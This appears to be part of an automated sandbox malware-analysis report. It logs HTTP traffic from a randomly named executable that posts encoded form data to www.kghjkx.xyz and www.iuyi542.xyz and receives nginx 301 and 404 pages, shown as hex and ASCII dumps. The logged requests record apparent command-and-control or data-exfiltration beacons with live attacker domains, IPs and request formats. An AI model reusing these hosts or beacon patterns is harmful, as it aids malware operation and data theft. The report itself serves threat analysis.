                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            35192.168.2.224919647.129.103.18580652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:52:15.818451881 CET784OUTPOST /usop/ HTTP/1.1
                                                                                                                            Host: www.kghjkx.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.kghjkx.xyz
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 203
                                                                                                                            Referer: http://www.kghjkx.xyz/usop/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 36 45 7a 33 30 5a 57 58 4d 55 6e 44 6d 6d 4d 54 34 47 57 6d 5a 37 31 55 6e 4d 71 42 51 33 4c 5a 51 35 41 5a 36 7a 4f 5a 61 4b 6e 30 53 2f 51 63 62 50 6e 61 52 51 46 4f 75 54 39 48 46 75 57 35 39 73 53 65 74 6c 4a 72 6b 30 49 50 4d 73 48 63 44 30 41 78 4f 6c 45 66 42 73 4f 4c 57 79 35 69 74 55 77 57 2b 2f 74 32 4c 57 59 2b 67 65 31 75 61 75 68 63 31 76 4d 42 55 39 75 38 36 47 39 6d 72 4e 79 68 4d 45 5a 64 38 47 65 30 64 53 37 64 31 46 6b 43 6c 2b 52 65 5a 39 6a 34 41 48 41 64 44 68 39 6d 5a 58 73 6a 68 50 6c 4e 4a 4a 51 47 59 39 61 53 72 31 71 61 56 47 71 76 2b 54 73 6e 2f 77 3d 3d
                                                                                                                            Data Ascii: mFptYb=6Ez30ZWXMUnDmmMT4GWmZ71UnMqBQ3LZQ5AZ6zOZaKn0S/QcbPnaRQFOuT9HFuW59sSetlJrk0IPMsHcD0AxOlEfBsOLWy5itUwW+/t2LWY+ge1uauhc1vMBU9u86G9mrNyhMEZd8Ge0dS7d1FkCl+ReZ9j4AHAdDh9mZXsjhPlNJJQGY9aSr1qaVGqv+Tsn/w==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            36192.168.2.224919747.129.103.18580652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:52:18.437149048 CET2472OUTPOST /usop/ HTTP/1.1
                                                                                                                            Host: www.kghjkx.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.kghjkx.xyz
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 3627
                                                                                                                            Referer: http://www.kghjkx.xyz/usop/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 36 45 7a 33 30 5a 57 58 4d 55 6e 44 6d 47 63 54 30 46 4f 6d 51 37 31 54 6f 73 71 42 61 58 4c 64 51 34 38 5a 36 32 76 63 61 63 2f 30 53 75 41 63 56 4b 4c 61 54 51 46 4f 6f 54 39 62 47 65 57 76 39 74 32 6f 74 6e 51 65 6b 79 51 50 65 62 44 63 54 79 55 2b 45 31 45 64 46 73 4f 4b 57 79 34 36 74 55 67 53 2b 2f 70 63 4c 57 77 2b 67 73 64 75 64 65 68 66 36 50 4d 42 55 39 75 77 36 47 39 6a 72 4a 65 35 4d 41 52 4e 37 33 75 30 45 7a 62 64 33 6d 38 42 6e 2b 52 61 46 74 69 51 54 47 31 57 4b 6e 78 49 62 6d 63 45 2b 73 49 72 43 4b 35 4b 41 37 65 2b 6f 6c 69 45 64 69 62 37 32 67 45 71 6a 59 55 61 63 38 46 6a 58 44 6e 35 50 53 57 33 2b 55 6a 6c 68 62 64 67 63 79 30 71 46 32 77 47 6d 31 51 73 32 53 4d 38 36 73 72 38 54 6e 47 5a 54 5a 53 71 32 63 33 4c 67 6d 42 39 46 36 78 6b 49 5a 33 48 39 48 4f 68 50 36 71 5a 6f 51 69 41 2f 4a 70 65 71 71 65 30 4e 53 58 47 51 6f 63 75 79 4e 52 76 69 31 57 68 42 38 48 7a 78 73 57 59 79 46 50 33 6a 43 46 75 4f 32 4c 33 76 64 53 51 6d 45 62 50 69 63 64 76 78 74 52 [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=6Ez30ZWXMUnDmGcT0FOmQ71TosqBaXLdQ48Z62vcac/0SuAcVKLaTQFOoT9bGeWv9t2otnQekyQPebDcTyU+E1EdFsOKWy46tUgS+/pcLWw+gsdudehf6PMBU9uw6G9jrJe5MARN73u0Ezbd3m8Bn+RaFtiQTG1WKnxIbmcE+sIrCK5KA7e+oliEdib72gEqjYUac8FjXDn5PSW3+Ujlhbdgcy0qF2wGm1Qs2SM86sr8TnGZTZSq2c3LgmB9F6xkIZ3H9HOhP6qZoQiA/Jpeqqe0NSXGQocuyNRvi1WhB8HzxsWYyFP3jCFuO2L3vdSQmEbPicdvxtR8Pz95rAKkXL0uvalWzd0qkZBLhVF5B0CAo/vMk+v+A5nhN99I5IXCJ6Iaof9PW/w9q9d7AALXyp4PEDs17ihjOlC3bLlgPPoHnjHrqcl99sGrO3cKhXmbxPjpSLM616SFi4Btl5uHlTnJO9UC//qMQdtsb6+sMFF+XZUJaqfNUFDcxDwe9cS0IEfvlBQXmC6r1+NmoFErSoz8v6pK9HtnmUnRTVAUaUKYNzrddO98D0fmki9Nf2Zwh26p5ggIgomIpLC3MkT9X1w8ytJeCgcNkmhyRQLaTPyWoQFnLKyPLtOYEIu8D/8IkTdGbYWPUAUR6DTW9c9fQQOOaTv4EyHvZJxycBwXkM+UI/vGnM7w0yQccverLf9c4okbbt9emgOCTflLQHaPbUEqOkhHcfvr0bgmUyLf3zgrDBxoIvtBaHCeBvZ/4C8bb5Pe7Nc8YdFFGhDkAzFFQm0SLZuKMW3CFyidM2A3Zgb//RLKMdkMXuhXXqnLSBmTx1nHFr65WKpoQZxzfcYapPD8IYGYWwE3za/ob3pEhQ5JJRF87bpp2QzXLKZPpeACInTSQyRxjzLvx8/MnTexGPlH6q7V3K7ACgcQ94yto8/0EGv4LRgQVx0mKv9XytWRPDun7X4ae43vh2t4glKIe/TkY33xIVssGljac3DuuIb2J [TRUNCATED]


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            37192.168.2.224919847.129.103.18580652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:52:20.968383074 CET528OUTGET /usop/?mFptYb=3GbX3siKa3fb4xoywmO7dLt2gtHeawz6Sbk2xDjabsziN9g8eu79XBc6hQhNCIiJycOeh1EqhE8oaarBESMUTzpbIdTTfy1FzFAf98MVDEsTj+MFe4tIzu4mcpDK&Vta=nFypuDtholF HTTP/1.1
                                                                                                                            Host: www.kghjkx.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Nov 7, 2024 10:52:21.975764036 CET546INHTTP/1.1 301 Moved Permanently
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 07 Nov 2024 09:52:21 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 162
                                                                                                                            Connection: close
                                                                                                                            Location: https://www.kghjkx.xyz/usop/?mFptYb=3GbX3siKa3fb4xoywmO7dLt2gtHeawz6Sbk2xDjabsziN9g8eu79XBc6hQhNCIiJycOeh1EqhE8oaarBESMUTzpbIdTTfy1FzFAf98MVDEsTj+MFe4tIzu4mcpDK&Vta=nFypuDtholF
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            38192.168.2.224919938.47.237.2780652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:52:28.047858953 CET2472OUTPOST /cymd/ HTTP/1.1
                                                                                                                            Host: www.iuyi542.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.iuyi542.xyz
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 2163
                                                                                                                            Referer: http://www.iuyi542.xyz/cymd/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 66 53 35 35 43 43 33 45 68 38 76 66 37 54 6e 78 71 51 43 37 5a 52 76 74 56 42 56 54 78 57 51 69 54 46 34 4c 66 77 30 72 45 70 6a 74 65 70 48 70 46 48 66 45 49 59 43 71 50 51 67 42 30 67 70 51 54 59 6c 2b 38 6b 52 32 4b 7a 69 4e 44 51 59 7a 51 59 73 65 68 55 79 6b 63 76 51 36 63 4e 52 6c 47 52 64 37 55 6c 2f 35 72 51 34 68 52 45 44 79 57 6d 33 44 72 6e 44 33 61 75 4d 4e 45 45 64 62 39 6e 58 78 33 56 42 70 45 68 4c 59 45 77 69 4f 53 45 57 4a 71 44 33 76 6a 6b 6a 59 38 6b 49 6d 55 66 4c 59 55 49 4a 75 50 36 58 32 34 79 54 61 53 45 35 41 43 42 4b 4c 2b 31 2b 39 76 4c 69 79 35 50 30 61 72 39 54 75 4a 53 66 42 43 4f 54 39 51 35 65 4f 46 6f 49 64 48 7a 73 33 74 6f 64 7a 68 77 72 69 6b 37 30 34 71 4a 42 4d 38 63 42 30 62 72 49 35 61 33 39 44 77 45 37 7a 49 33 75 4b 65 46 38 67 4f 58 38 33 32 41 33 70 66 47 4b 46 79 67 49 73 6b 6b 2b 2b 77 77 49 47 72 45 36 32 7a 36 56 55 51 77 74 76 4c 4c 74 77 32 50 2b 34 64 51 6f 4c 30 75 48 68 4e 61 30 75 4a 36 42 42 4d 50 63 34 64 76 34 7a 48 78 55 [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=fS55CC3Eh8vf7TnxqQC7ZRvtVBVTxWQiTF4Lfw0rEpjtepHpFHfEIYCqPQgB0gpQTYl+8kR2KziNDQYzQYsehUykcvQ6cNRlGRd7Ul/5rQ4hREDyWm3DrnD3auMNEEdb9nXx3VBpEhLYEwiOSEWJqD3vjkjY8kImUfLYUIJuP6X24yTaSE5ACBKL+1+9vLiy5P0ar9TuJSfBCOT9Q5eOFoIdHzs3todzhwrik704qJBM8cB0brI5a39DwE7zI3uKeF8gOX832A3pfGKFygIskk++wwIGrE62z6VUQwtvLLtw2P+4dQoL0uHhNa0uJ6BBMPc4dv4zHxUvsG+bTZ9qegu1SMj9wwxU/d7cSXZqaBGTilID3mrxYRWBQvlYDjULjH7f0gqxfeYlQ7Nmfm3c3jkXoH5BZB/aDVvAb+a1Xhbc7bDynHUAMrRUi1cD6MRwPslqHL9kGMXBgta/mNKR6WUOwhlr4shaYV3fJeEBlFzsHJanLb9fSdPM1v54EaaNX39TfMkcepQBaO6Obq027hVn030kfYxIsS9yzQy5EcXEhvU5cn0xYjkiyCwciPqbNEpBvZfC680yDy4DO9ohBA7kjvCdA0rTPY8/DSzyLFzXleLopzvKzFq889Q8/MxF1xi3cgnddPUNxk1FRUgMvlrbfhfoHB8PreEFOZ+inqJJnAcquBN89Xyl97E52cks/v9DkIMMVt4BAQEoCoSXdV5eSthk9HdEO7DSxXj4ERrHYivwwCTQPIJ38LvRc3tesuJxtlp00MOTF7U6gh1HgQ+vTZaXmNzEWXaKS8eUsX+wWYq74nMqU5cCvV0/OtbFEuSZDLx67w3G/9cjENt3KClPwJgI5SdCW60pkTCbzRW4WIsj/O4CH6F14x+sTJOQkMz+V39Ei02FjUgc7slC4Ca4lAwAXbevjOfZLFTmesdsWKxUIBnwRICXU4ejGEwV1VwG5yUtgv8EL7C7rpWhs9bBQHAAnNZ/Z3SdAuVNDYDfi [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:52:28.053275108 CET276OUTData Raw: 2b 50 42 77 34 65 6d 54 68 59 39 41 32 46 78 69 37 75 4d 6b 31 6b 6d 6c 61 6a 64 6a 35 4e 35 51 69 39 31 6d 68 44 67 50 39 52 5a 34 30 50 4f 72 4e 51 70 68 74 2b 45 4a 43 45 68 58 62 69 47 73 49 42 6b 7a 50 44 6f 38 2f 66 71 61 6d 75 31 30 4c 44
                                                                                                                            Data Ascii: +PBw4emThY9A2Fxi7uMk1kmlajdj5N5Qi91mhDgP9RZ40POrNQpht+EJCEhXbiGsIBkzPDo8/fqamu10LDtFDvCMpdI3sQCrpZ+qvr2WcCVTaexguczh0KIF1C0v58aWuNQDvZJuxgg01eMXxFUHG+F9L2TrKMwOb9W+6nhq7SHD1Nz/Qdxsu4gGFZZkTMA3J7JjM+0dSdMiRJQuoVbxPIpPWD2bz6HDl8FIXE9UMaPTMeAb5CP
                                                                                                                            Nov 7, 2024 10:52:28.632575989 CET170INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 07 Nov 2024 09:52:28 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 167433
                                                                                                                            Connection: close
                                                                                                                            ETag: "652641ca-28e09"
                                                                                                                            Nov 7, 2024 10:52:28.632700920 CET1236INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 20 50 61 67 65 3c
                                                                                                                            Data Ascii: <html lang="en"><head> <meta charset="UTF-8"> <title>CodePen - 404 Page</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style>button,hr,input{overflow:visible}audio,canvas,progress,video{dis
                                                                                                                            Nov 7, 2024 10:52:28.632816076 CET212INData Raw: 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 73 75 62 6d
                                                                                                                            Data Ascii: ne-height:1.15;margin:0}button,input{}button,select{text-transform:none}[type=submit], [type=reset],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inn
                                                                                                                            Nov 7, 2024 10:52:28.632827044 CET1236INData Raw: 65 72 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64
                                                                                                                            Data Ascii: er,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:0}[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring,button:-moz-focusring{outline:ButtonText dotted 1px}fieldset{border:1
                                                                                                                            Nov 7, 2024 10:52:28.632898092 CET212INData Raw: 3b 2d 2d 6f 72 61 6e 67 65 3a 23 66 64 37 65 31 34 3b 2d 2d 79 65 6c 6c 6f 77 3a 23 66 66 63 31 30 37 3b 2d 2d 67 72 65 65 6e 3a 23 32 38 61 37 34 35 3b 2d 2d 74 65 61 6c 3a 23 32 30 63 39 39 37 3b 2d 2d 63 79 61 6e 3a 23 31 37 61 32 62 38 3b 2d
                                                                                                                            Data Ascii: ;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#f
                                                                                                                            Nov 7, 2024 10:52:28.632973909 CET1236INData Raw: 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69
                                                                                                                            Data Ascii: fc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helve
                                                                                                                            Nov 7, 2024 10:52:28.632982969 CET212INData Raw: 65 6d 7d 61 62 62 72 5b 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 5d 2c 61 62 62 72 5b 74 69 74 6c 65 5d 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65
                                                                                                                            Data Ascii: em}abbr[data-original-title],abbr[title]{text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0}address{margin-bottom:1rem;font-style:norma
                                                                                                                            Nov 7, 2024 10:52:28.633114100 CET1236INData Raw: 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75
                                                                                                                            Data Ascii: l;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}dfn{font-style:italic}b,strong{font-weight:bolder}small{f
                                                                                                                            Nov 7, 2024 10:52:28.633136034 CET212INData Raw: 6f 6d 3a 2e 35 72 65 6d 7d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d
                                                                                                                            Data Ascii: om:.5rem}button{border-radius:0}button:focus{outline:1px dotted;outline:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}b
                                                                                                                            Nov 7, 2024 10:52:28.633440971 CET1236INData Raw: 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d
                                                                                                                            Data Ascii: utton,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            39192.168.2.224920038.47.237.2780652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:52:30.581115961 CET787OUTPOST /cymd/ HTTP/1.1
                                                                                                                            Host: www.iuyi542.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.iuyi542.xyz
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 203
                                                                                                                            Referer: http://www.iuyi542.xyz/cymd/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 66 53 35 35 43 43 33 45 68 38 76 66 37 51 50 78 34 56 75 37 59 78 76 74 59 68 56 54 6f 47 51 6b 54 46 30 44 66 78 77 37 45 2b 33 74 65 35 33 70 46 31 48 45 4c 59 43 74 58 67 67 4e 77 67 70 46 54 59 6c 49 38 6d 56 32 4b 33 4b 4e 41 32 45 7a 57 5a 73 64 6a 6b 79 6d 58 50 51 42 63 4e 73 46 47 52 41 67 55 6c 48 35 72 58 63 68 41 30 54 79 63 6a 62 44 67 48 44 39 52 4f 4d 65 45 45 59 5a 39 6e 47 38 33 56 74 70 46 51 48 59 45 45 69 4f 44 6e 2b 4a 68 6a 33 69 6b 6b 69 30 74 6e 73 32 4d 35 54 7a 49 70 31 68 4d 4b 6a 36 33 44 7a 61 64 55 31 42 4a 68 2b 70 38 79 72 4f 68 71 66 6f 6c 41 3d 3d
                                                                                                                            Data Ascii: mFptYb=fS55CC3Eh8vf7QPx4Vu7YxvtYhVToGQkTF0Dfxw7E+3te53pF1HELYCtXggNwgpFTYlI8mV2K3KNA2EzWZsdjkymXPQBcNsFGRAgUlH5rXchA0TycjbDgHD9ROMeEEYZ9nG83VtpFQHYEEiODn+Jhj3ikki0tns2M5TzIp1hMKj63DzadU1BJh+p8yrOhqfolA==
                                                                                                                            Nov 7, 2024 10:52:31.228734016 CET1236INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 07 Nov 2024 09:52:31 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 167433
                                                                                                                            Connection: close
                                                                                                                            ETag: "652641ca-28e09"
                                                                                                                            Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 20 50 61 67 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 09 62 75 74 74 6f 6e 2c 68 72 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 70 72 6f 67 72 65 73 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 70 72 6f 67 72 65 73 73 2c 73 75 62 2c 73 75 70 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69 [TRUNCATED]
                                                                                                                            Data Ascii: <html lang="en"><head> <meta charset="UTF-8"> <title>CodePen - 404 Page</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style>button,hr,input{overflow:visible}audio,canvas,progress,video{display:inline-block}progress,sub,sup{vertical-align:baseline}html{font-family:sans-serif;line-height:1.15;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0} menu,article,aside,details,footer,header,nav,section{display:block}h1{font-size:2em;margin:.67em 0}figcaption,figure,main{display:block}figure{margin:1em 40px}hr{box-sizing:content-box;height:0}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}a{background-color:transparent;-webkit-text-decoration-skip:objects}a:active,a:hover{outline-width:0}abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}b,strong{font-weight:bolder}dfn{font-style:italic}mark{background-color:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;p [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:52:31.228749037 CET1236INData Raw: 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c
                                                                                                                            Data Ascii: :not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{}button,select{text-transform:none}[
